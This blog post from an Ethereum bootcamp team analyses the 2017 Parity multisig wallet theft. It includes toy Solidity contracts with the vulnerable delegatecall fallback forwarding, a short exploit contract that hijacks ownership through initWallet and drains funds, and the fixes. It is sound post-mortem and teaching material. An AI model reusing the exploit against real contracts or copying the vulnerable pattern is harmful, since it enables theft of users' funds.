An In-Depth Look at the Parity Multisig Bug

[Image: Multiple signatures are better than one.]

This year’s IC3-Ethereum bootcamp brought together the Ethereum Foundation’s top developers, IC3 students and faculty, and dozens of others from industry and academia. We worked together over the course of a week on ten exciting, intensive development projects, and ended with a bang on the last day. The Ethereum wallet rescue group (with a little help from a couple of IC3ers) scrambled to respond when 153,037 Ether (worth $30+ million) was stolen from three large Ethereum multisig wallet contracts.

The MultisigExploit-Hacker (MEH), as he, she, or they are known, exploited a vulnerability in the Parity 1.5 client’s multisig wallet contract. A fairly straightforward attack allowed the hacker to take ownership of a victim’s wallet with a single transaction. The attacker could then drain the victim’s funds, as happened in these three transactions once the wallets were compromised. The victims were three ICO projects: Edgeless Casino, Swarm City, and æternity.

In the following we will give an in-depth technical explanation of the hack, describe the white-hat response, and draw some lessons about how such breaches might be prevented in the future.

How the attack worked

There are many reports that the vulnerability was the simple omission of an “internal” modifier which, thanks to Solidity’s “default-public” visibility policy, made it possible for anyone anywhere to take ownership of an existing wallet. While it is true that the right modifiers would have prevented the attack, the attack is a little more clever than this suggests.

The vulnerable MultiSig wallet was split into two contracts to reduce the size of each wallet and save gas: A library contract called “WalletLibrary” and an actual “Wallet” contract consuming the library. Here is a toy version of WalletLibrary:

contract WalletLibrary {
    address owner;

    // called by constructor
    function initWallet(address _owner) {
        owner = _owner;
        // ... more setup ...
    }

    function changeOwner(address _new_owner) external {
        if (msg.sender == owner) {
            owner = _new_owner;
        }
    }

    function () payable {
        // ... receive money, log events, ...
    }

    function withdraw(uint amount) external returns (bool success) {
        if (msg.sender == owner) {
            return owner.send(amount);
        } else {
            return false;
        }
    }
}

WalletLibrary looks pretty boring: Beyond some initialization code that will be called in the constructor of Wallet, WalletLibrary provides the basic functionality you would expect from a wallet: Anybody can deposit money into the wallet, but only the owner can withdraw her funds or change the owner of the wallet.

Here is a simplified example contract that could use this WalletLibrary:

contract Wallet {
    // storage layout: owner must occupy slot 0, the same slot it occupies in
    // WalletLibrary, so that the library's delegatecalled code writes to the
    // right variable
    address owner;
    address _walletLibrary;

    function Wallet(address _owner) {
        // replace the following line with "_walletLibrary = new WalletLibrary();"
        // if you want to try to exploit this contract in Remix.
        _walletLibrary = <address of pre-deployed WalletLibrary>;
        _walletLibrary.delegatecall(bytes4(sha3("initWallet(address)")), _owner);
    }

    function withdraw(uint amount) returns (bool success) {
        // note: the ABI signature must use the canonical type name "uint256"
        return _walletLibrary.delegatecall(bytes4(sha3("withdraw(uint256)")), amount);
    }

    // fallback function gets called if no other function matches call
    function () payable {
        _walletLibrary.delegatecall(msg.data);
    }
}

This time, the code looks more complex. Notice the use of delegatecall throughout the contract. delegatecall is designed to enable the use of shared libraries, saving precious storage space on the blockchain otherwise wasted in duplicating widely used, standard code.

delegatecall works by executing the program code of a contract in the environment (and with the storage) of its calling client contract. This means that the library code will run, but will directly modify the data of the client calling the library. It essentially is as if the code of the library had been pasted into the client issuing the delegatecall. Any storage writes inside the delegatecall will be made to the storage of the client, not the storage of the library. delegatecall allows a client contract to delegate the responsibility of handling a call to another contract.
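To make the storage semantics concrete, here is a minimal, hypothetical pair of contracts (our own illustration, not taken from the Parity code), in the same Solidity style as above. Library’s increment code runs via delegatecall, but it is Client’s counter that changes:

contract Library {
    uint public counter;   // slot 0

    function increment() {
        counter += 1;      // writes slot 0 of whichever contract is executing this code
    }
}

contract Client {
    uint public counter;   // slot 0, deliberately mirrors Library's layout
    address lib;

    function Client(address _lib) {
        lib = _lib;
    }

    function increment() {
        // Library's code runs in Client's storage context:
        // Client.counter goes up, Library.counter is untouched.
        lib.delegatecall(bytes4(sha3("increment()")));
    }
}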

At the EVM level, a contract is just a single program that takes a variable-length binary blob of data as input and produces a variable-length binary blob of data as its output. A transaction in the EVM provides an address and some data. If the address holds code, this data is fed to a “jump table”-like structure at the beginning of the contract’s code, with some of the data (the “function selector”) indexing jumps to different parts of the contract’s code, using the standard encodings described in the Ethereum Contract ABI specification. Above, the function selector for calling a function called initWallet that takes an address as its argument is the mysterious-looking bytes4(sha3("initWallet(address)")).
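As a small illustration (our own hypothetical helper, not part of the wallet code), this is how the call data for initWallet(address) is laid out, and how the selector can be computed on-chain:

contract SelectorDemo {
    // For a transaction calling initWallet(0x1234...), the data field is:
    //   bytes  0..3  : bytes4(sha3("initWallet(address)"))  <- the function selector
    //   bytes  4..35 : the address argument, left-padded to 32 bytes
    function initWalletSelector() constant returns (bytes4) {
        return bytes4(sha3("initWallet(address)"));
    }
}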

Now that we understand delegatecall and how function selectors work, we can read and understand the Wallet contract. To begin with, we have a simple constructor that delegates the initialization of the contract’s state to WalletLibrary. This is followed by a withdraw function which, once again, delegates its task to WalletLibrary.

Finally, we want our wallet to be able to receive funds. This is commonly handled with a Solidity construct called a fallback function. A fallback function is a default function that is invoked whenever a call’s data doesn’t match any function in the contract’s lookup table. Since we might want all sorts of logic to be triggered upon the receipt of funds (e.g. logging events), we again delegate this to WalletLibrary and pass along any data we might have received with the call. This data forwarding also exposes WalletLibrary’s changeOwner function, making it possible to change the Wallet’s owner.

Wallet is now completely vulnerable. Can you spot the vulnerability?

You might have noticed that the initWallet function of WalletLibrary changes the owner of the Wallet. Whoever owns the Wallet can then withdraw whatever funds are contained in the contract. But as you can see, initWallet is only executed in the constructor of Wallet (which can only run once, when Wallet is created), and Wallet doesn’t itself have an initWallet function. Any call sending this function selector to Wallet in a transaction’s data won’t match.

So, the attacker cannot call Wallet.initWallet(attacker) to change the owner of the wallet and we are safe after all‽

As it turns out, the implementation of the fallback function means that we are not. As we already saw, a fallback function is a default function that is invoked when a call’s data doesn’t match any function in the lookup table. The intent is to allow contracts to respond to the receipt of funds and/or unexpected data patterns; in our wallet, it both enables the receipt of funds and allows functions to be called in the wallet library that are not explicitly specified in the wallet.

One use of such a “generic forward” feature could be upgradeability; the pattern is sometimes even recommended as a precaution in case functions not anticipated at release time turn out to be needed later: by allowing the wallet’s owner to change the address of the library contract, one could keep the wallet, with its funds, at the same address while swapping out the underlying implementation. In the Parity contract, it is likely that data was forwarded only to save gas, as the contract is not upgradeable and all forwards could have been made explicit at compile time. Instead, this implicit default forwarding was used over explicit forwarding to expose certain functions like revoke.
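For illustration, such an upgrade hook (which is not present in the Parity wallet; this is purely a hypothetical sketch) could look like this inside our toy Wallet:

// Hypothetical addition to the toy Wallet above: because all unknown calls are
// already forwarded to whatever _walletLibrary points to, letting the owner
// repoint it upgrades the wallet's logic while keeping its address and balance.
function setLibrary(address _newLibrary) {
    if (msg.sender == owner) {
        _walletLibrary = _newLibrary;
    }
}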

So, when an attacker calls Wallet.initWallet(attacker), Wallet’s fallback function is triggered (Wallet doesn’t implement an initWallet function), and the jump table lookup fails. Wallet’s fallback function then delegatecalls WalletLibrary, forwarding all call data in the process. This call data consists of the function selector for the initWallet(address) function and the attacker’s address. When WalletLibrary receives the call data, it finds that its initWallet function matches the function selector and runs initWallet(attacker) in the context of Wallet, setting Wallet’s owner variable to attacker. BOOM! The attacker is now the wallet’s owner and can withdraw any funds at her leisure.
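Put together, the entire exploit fits into one small contract. The following is a hedged sketch against our toy Wallet above, not the attacker’s actual code:

contract WalletExploit {
    function pwn(address victim, uint amount) {
        // Step 1: Wallet has no initWallet entry in its jump table, so this
        // calldata falls through to the fallback, which delegatecalls
        // WalletLibrary.initWallet in Wallet's storage context. We are now the owner.
        victim.call(bytes4(sha3("initWallet(address)")), this);
        // Step 2: withdraw as the new owner.
        Wallet(victim).withdraw(amount);
    }

    // needed so that the wallet's send() of the stolen funds to us succeeds
    function () payable {}
}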

In reality, the initWallet function was more complicated and took more parameters, but the principle of the attack is exactly the one described above. You can see one of the initWallet calls of the attacker; the attacker then immediately withdrew the funds, earning her 26,793 ETH (or ~6.1 million USD). Not bad for two function calls and 60 cents in gas cost!

If initWallet had been marked as internal, there would have been no corresponding entry in the jump table, making it impossible to call initWallet from outside the contract. If initWallet had checked against double initialization, there would also have been no problem. Adding to the confusion is the fact that certain functions that are supposed to be callable from outside the contract are marked as external; one could easily (and wrongly) assume that all functions not marked external aren’t visible from the outside. In Parity’s patch to the vulnerable contract, a modifier was added to a helper function of the vulnerable wallet initialization process to throw an exception if the attacked initialization function was called again.
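Applied to our toy WalletLibrary, the second fix is a one-line guard. This is a sketch in the spirit of Parity’s patch (the real patch guards the actual, multi-parameter initialization path), not the patch itself:

contract FixedWalletLibrary {
    address owner;

    // throws if the wallet has already been initialized
    modifier only_uninitialized { if (owner != address(0)) throw; _; }

    function initWallet(address _owner) only_uninitialized {
        owner = _owner;
        // ... more setup ...
    }

    // ... changeOwner, withdraw, and the fallback function stay unchanged ...
}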

The response

A white-hat recovery team (MEH-WH) identified and drained all remaining vulnerable wallets into this wallet. They recovered a total of $78 million worth of tokens (half the value being BAT and ICONOMI) plus 377,105+ ETH (around $72 million). The funds will be returned to their owners as noted on r/ethereum:

If you hold a multisig contract that was drained, please be patient. [The MEH-WH] will be creating another multisig for you that has the same settings as your old multisig but with the vulnerability removed and will return your funds to you there.

This is all well and good for the recovered funds, but the stolen funds are in all likelihood unrecoverable. The Ethereum community cannot, for instance, easily execute a hard fork as they did in the case of The DAO. The DAO had a built-in 34-day delay, during which the stolen funds were locked into the contract and subject to recovery. The MEH only needs to identify compliant exchanges to cash out or convert to ZEC to retain the stolen funds with full anonymity. The MEH has already cashed out small amounts, as in this roughly 50 ETH transaction at Changelly.

Unless the hacker trips up, the community will have to resign itself to the loss of the money (more than in any U.S. bank robbery) and an enduring mystery over the identity of the thief or thieves. In case you’re wondering, none of our ten bootcamp projects involved stealing ETH from multisig wallets. :)

Lessons

Looking at the history of the vulnerable contract in Parity’s github repository, we find that the contract was first added as a complete blob of code on December 16 of last year in commit 63137b. The contract was edited extensively once, on March 7 in commit 4d08e7b and then wasn’t touched until the attack occurred. Since the contract was originally added as one big blob, it was likely copied from somewhere else, making its provenance in development unclear. Note that the first version of the contract already contained the vulnerable code.

It is hard to believe that such a large (and valuable!) vulnerability could have gone undiscovered for so long. However, in light of the contract’s length and complexity, and of the complex interaction between Solidity’s fallback functions, its default-public function visibility, delegatecall, and call data forwarding that enables the attack, this seems less surprising. At least one other multisig contract had an analogous bug that stemmed from the lack of a function modifier.

We believe that there are multiple levels on which lessons should be drawn from this attack:

First of all, we recommend that Solidity adopt default-private visibility for contract functions. This change would likely have prevented this exploit and others like it. It may also be an opportunity to batch in a number of other safety- and usability-related changes, much-needed additional types, and solutions to common gripes. It is also an opportune time to think about versioning at the source-language level, so that new features can be introduced into the language without having to worry about backwards compatibility.

In a more general sense, we believe that this attack was the result of security’s oldest enemy, complexity: it seems likely that the missing function modifiers would have been discovered by the developers if Wallet had just been a single contract instead of delegatecalling out to WalletLibrary. Even without the modifiers, Wallet would not have been vulnerable had its fallback function not unconditionally forwarded all calldata to WalletLibrary, exposing unexpected functions that can modify the data in Wallet.

Interestingly, this specific attack may not have been caught by testing as implemented by most developers, since the vulnerability wasn’t caused by incorrect behaviour of a function, but rather by the unexpected exposure of a function (that behaved correctly) to the public. Nevertheless, we do, of course, strongly recommend that smart contract authors thoroughly test their contracts, and a test policy that included testing for function visibility on every function would have exposed the issue.
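As an illustration of what such a visibility test could look like for the toy Wallet above (a hedged sketch; a real project would more likely express this in its test harness than in Solidity), the test attempts the takeover from an unrelated contract and asserts that no funds can be pulled out:

contract VisibilityTest {
    // Assumes `wallet` is an instance of the toy Wallet above that already
    // holds at least 1 wei. Returns true if an outsider (this contract) can
    // make itself the owner and pull funds out; a test suite should require false.
    function canHijack(address wallet) returns (bool hijacked) {
        wallet.call(bytes4(sha3("initWallet(address)")), this);  // takeover attempt
        uint balanceBefore = this.balance;
        Wallet(wallet).withdraw(1);                               // withdrawal attempt
        hijacked = this.balance > balanceBefore;
    }

    // needed to receive the wei sent back by a successful withdrawal
    function () payable {}
}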

The creation of a rigorously followed best practices guide for testing and smart contract review that requires that visibility assumptions be made explicit and tested is thus, we believe, one of the strong lessons from this attack. Today, it is not uncommon to see large contracts deployed with only a handful of unit tests, with little to no reasoning about interaction between contracts, and with unit tests that do not even accomplish full statement or decision coverage. Beyond these glaring omissions of basic software quality techniques standard in the space, it remains apparent that there is still work to be done in understanding best practices for high level tooling and language design for smart contracts.

The Parity project has released a post-mortem giving a high level overview of the attack and discussing the steps Parity will take in the future to ensure that such an attack will not happen again. Many of their conclusions agree with the ones we made here.

Acknowledgements

We would like to thank Everett Hildenbrandt of the KEVM project for his feedback and helpful suggestions on explaining the attack.
